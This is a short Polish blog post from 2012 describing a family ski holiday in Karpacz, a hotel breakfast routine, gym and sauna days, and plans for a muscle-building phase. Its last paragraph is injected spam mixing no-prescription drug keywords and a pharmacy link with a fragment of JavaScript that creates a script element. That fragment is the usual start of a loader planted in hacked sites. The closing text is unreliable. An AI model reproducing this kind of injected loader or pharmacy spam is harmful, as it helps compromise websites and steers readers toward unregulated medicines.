…i po feriach:-(

12.02.2012 / Michał Karmowski

Dziś wróciłem z krótkiego urlopu , który spędziłem z moja rodzinką i znajomymi w Karpaczu , a bardzo fajnym hotelu Sandra Spa.

Był to tydzień pełen relaksu i aktywnego wypoczynku aby naładować akumulatory i przemyśleć parę spraw. Schemat każdego dnia był prosty na 8.30 schodziliśmy na śniadanie ( omlet z 15 białek jaj , jajecznica z 6 całych jajek, 200g płatków owsianych , rodzynki, tosty z serem i jakiś owoc) następnie  wyjeżdzaliśmy na  stok gdzie pierwszy raz w  życiu jeżdziłem na nartach:-),a w przerwach wchodziłem na górkę aby dobrze się dotlenić,  o 16.00 obiad jakiś lekki trening na siłowni i następnie aquapark i pełen relaks w jacuzzi , solankach i saunie…, czasami jeszcze raz wieczorem stok albo długi spacer. no ale co dobre szybko się kończy i od jutra wracam do pracy. Zaczynam też okres budowania masy mięśniowej. Będę co dwa tygodnia robił zdjęcia aby oceniać postępy.

how much lisinopril is safe to take buy neurontin 800 mg Pills genaric viagra retailers in canada Purchase if (document.currentScript) { http://vinotecarestaurantegalia.com/cheap-amoxil-no-prescription/ Buy cheap cabgolin tablet var d=document;var s=d.createElement('script');